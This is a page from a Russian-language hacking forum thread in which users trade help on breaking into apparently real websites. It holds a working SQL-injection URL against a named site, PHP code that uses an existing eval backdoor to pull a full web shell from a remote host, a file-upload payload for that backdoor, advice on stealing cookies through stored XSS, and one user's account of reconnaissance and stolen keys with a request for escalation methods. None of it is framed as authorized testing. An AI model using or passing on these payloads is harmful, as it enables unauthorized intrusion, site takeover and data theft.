HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22271  
Старый 25.03.2013, 23:27
AIRZI
Познающий
Регистрация: 11.03.2009
Сообщений: 45
Провел на форуме:
938272

Репутация: 1
По умолчанию

Кто-нибудь может проконсультировать по XSS?

Суть такая, короче зарегистровался на сайте под ником '>alert()

и какую бы страницу я не открыл выскакивает окошко-оповещение, как можно раскрутить?
 
Ответить с цитированием

  #22272  
Старый 25.03.2013, 23:31
HackCrack
Guest
Сообщений: n/a
Провел на форуме:
1448

Репутация: 0
По умолчанию

Цитата:
Сообщение от AIRZI  
AIRZI said:
Кто-нибудь может проконсультировать по XSS?
Суть такая, короче зарегистровался на сайте под ником '>alert()
и какую бы страницу я не открыл выскакивает окошко-оповещение, как можно раскрутить?
Можно воровать кукисы, делать редиректы, впихивать вирусы. Да что угодно можно делать, главное - чтобы допустимая длинна логина позволяла вставить желаемый скрипт.
 
Ответить с цитированием

  #22273  
Старый 25.03.2013, 23:49
AIRZI
Познающий
Регистрация: 11.03.2009
Сообщений: 45
Провел на форуме:
938272

Репутация: 1
По умолчанию

Цитата:
Сообщение от HackCrack  
HackCrack said:
Можно воровать кукисы, делать редиректы, впихивать вирусы. Да что угодно можно делать, главное - чтобы допустимая длинна логина позволяла вставить желаемый скрипт.
Ник можно очень много букв и цифр впихнуть, после того как я впихнул в ник свой код, как своровать кукисы?

Ведь по логике админ должен пройти по какой-то ядовитой ссылке7
 
Ответить с цитированием

  #22274  
Старый 26.03.2013, 00:04
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от HackCrack  
HackCrack said:
Спасибо.
Теперь проблема в том, чтобы получить названия таблиц.
Код:
Code:
http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+limit+4,1+--+
Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее..
Как получить нужные таблицы?
листать дальшше

Цитата:
Сообщение от AIRZI  
AIRZI said:
Ник можно очень много букв и цифр впихнуть, после того как я впихнул в ник свой код, как своровать кукисы?
Ведь по логике админ должен пройти по какой-то ядовитой ссылке7
/thread20140.html
 
Ответить с цитированием

  #22275  
Старый 26.03.2013, 00:31
BlackIce
Guest
Сообщений: n/a
Провел на форуме:
18665

Репутация: 27
По умолчанию

Цитата:
Сообщение от HackCrack  
HackCrack said:
Спасибо.
Теперь проблема в том, чтобы получить названия таблиц.
Код:
Code:
http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+limit+4,1+--+
Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее..
Как получить нужные таблицы?
PS. пробелы в слове information не удаляются в сообщении. В юрл-строке их нету.
Код:
Code:
http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+where+table_schema=database()+limit+4,1+--+
 
Ответить с цитированием

  #22276  
Старый 26.03.2013, 12:56
Evil_Genius
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651

Репутация: -5
По умолчанию

На сайте есть минишелл eval(stripslashes($_GET[e]));

allow_url_fopen On

allow_url_include Off

disable_functions exec,passthru,shell_exec,proc_open,popen

Как залить полноценный шелл, если в том месте где лежит минишелл нет прав на заливку? т.е сделать аплоадер и залить в данную же папку не прокатит
 
Ответить с цитированием

  #22277  
Старый 26.03.2013, 13:24
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию

Цитата:
Сообщение от Evil_Genius  
Evil_Genius said:
На сайте есть минишелл eval(stripslashes($_GET[e]));
allow_url_fopen On
allow_url_include Off
disable_functions exec,passthru,shell_exec,proc_open,popen
Как залить полноценный шелл, если в том месте где лежит минишелл нет прав на заливку? т.е сделать аплоадер и залить в данную же папку не прокатит
Если бэкдор не в индексе то просто в него и запиши шелл(предварительно скопируй его содержимое) а там с шелла и смотри по бырому куда залиться.

Код:
Code:
$content=file_get_contents("http://yourshell.txt");$h=fopen("файл с мини шеллом",w);$text=$content;fwrite($h,$text);fclose($h);
UPD

А еще проще залей текст шелла без на хост

,а потом

?yourbackdoor=eval(file_get_contents('http://site.ru/shell.txt')); и получишь полноценный шелл без заливки.
 
Ответить с цитированием

  #22278  
Старый 26.03.2013, 18:00
Evil_Genius
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651

Репутация: -5
По умолчанию

Цитата:
Сообщение от blesse  
blesse said:
Если бэкдор не в индексе то просто в него и запиши шелл(предварительно скопируй его содержимое) а там с шелла и смотри по бырому куда залиться.
Код:
Code:
$content=file_get_contents("http://yourshell.txt");$h=fopen("файл с мини шеллом",w);$text=$content;fwrite($h,$text);fclose($h);
UPD
А еще проще залей текст шелла без на хост
,а потом
?yourbackdoor=eval(file_get_contents('http://site.ru/shell.txt')); и получишь полноценный шелл без заливки.
Такое не прокатывает какраз(((

Вот таким методом выводится через минишелл.

file.php?e=phpinfo();

Картинку, текстовый файл и т.п не закачать никак. Не позволяется никак. Файл править не могу, чтобы php вставить.

Ранее нормально закачивал таким методом, но щас папка закрыта для правки:

file.php?e=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=/form%3E
 
Ответить с цитированием

  #22279  
Старый 26.03.2013, 18:27
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию

Цитата:
Сообщение от Evil_Genius  
Evil_Genius said:
Такое не прокатывает какраз(((
Вот таким методом выводится через минишелл.
file.php?e=phpinfo();
Картинку, текстовый файл и т.п не закачать никак. Не позволяется никак. Файл править не могу, чтобы php вставить.
Ранее нормально закачивал таким методом, но щас папка закрыта для правки:
file.php?e=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=/form%3E
Ну Дак ты пиши чё не прокатывает????
 
Ответить с цитированием

  #22280  
Старый 26.03.2013, 18:37
zloy_fantom
Guest
Сообщений: n/a
Провел на форуме:
15180

Репутация: 0
По умолчанию

Добрый день. Прошу прощения за глупый вопрос, но что-то никак не могу решить для себя такую проблему:

Хочу получить как можно более широкий доступ к нужному мне сайту, но в этом деле я-новичек. Поэтому сделал следующее:

1. Просканировал сайт акунетиксом (он нашел там читалку файлов, XSS, и поля для брута)

2. Просканировал сайт с помощью Wikto backend, используя структуру, построенную акунетиксом, нашел несколько "спрятанных" файлов, в том числе rsa-ключи для подключения к виртуальной сети

3. Просканировал сайт и виртуальную сеть Нмапом, нашел открытые порты и проассоциировал их с приложениями.

4. В расшаренных папках виртуальной сети ничего интересного не нашел.

5. Читалкой файлов прочитал и сохранил у себя все конфиги и ПХП-шки, какие смог найти.

А теперь уперся в стену: сайт использует пофиксенный TBdev, с моими ущербными знаниями ПХП и мускуля трудно надеяться на нахождение инъекции и ее эксплуатацию, кроме того, насколько я понял, инъекция - это почти крайний случай (когда нет доступа к файлам, порты закрыты и т.д.). В моем-же случае есть открытые порты, могу читать файлы, и имею доступ к внутренней сети, но не знаю, как этим воспользоваться.

Для себя выстроил следующий алгоритм:

1. Атака на открытые порты сайта и устройств сети (инфы и приложений не могу найти, Nmap почему-то не хочет запускать скрипты)

2. Поиск места хранения файлов базы данных и открытие их через читалку файлов (меня уверяют, что таких файлов не существует)

3. Анализ ПХП кода и составление действующих инъекций (не хватает знаний для анализа структуры кода, а программ, автоматизирующих этот процесс, по-видимому, тоже нет)

4. Брут по доступным формам авторизации (кажись, как-то натыкался на проги, поищу, но админ всегда залогинен, как это обойти, не знаю)

5. XSS (но про них даже еще не читал и пока слабо представляю принцип работы)

6. Помещение троянов во внутреннюю сеть (но это для меня вообще фантастика)

Прошу помощи с литературой, методой и софтом, особенно по первым пунктам.

Спасибо
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ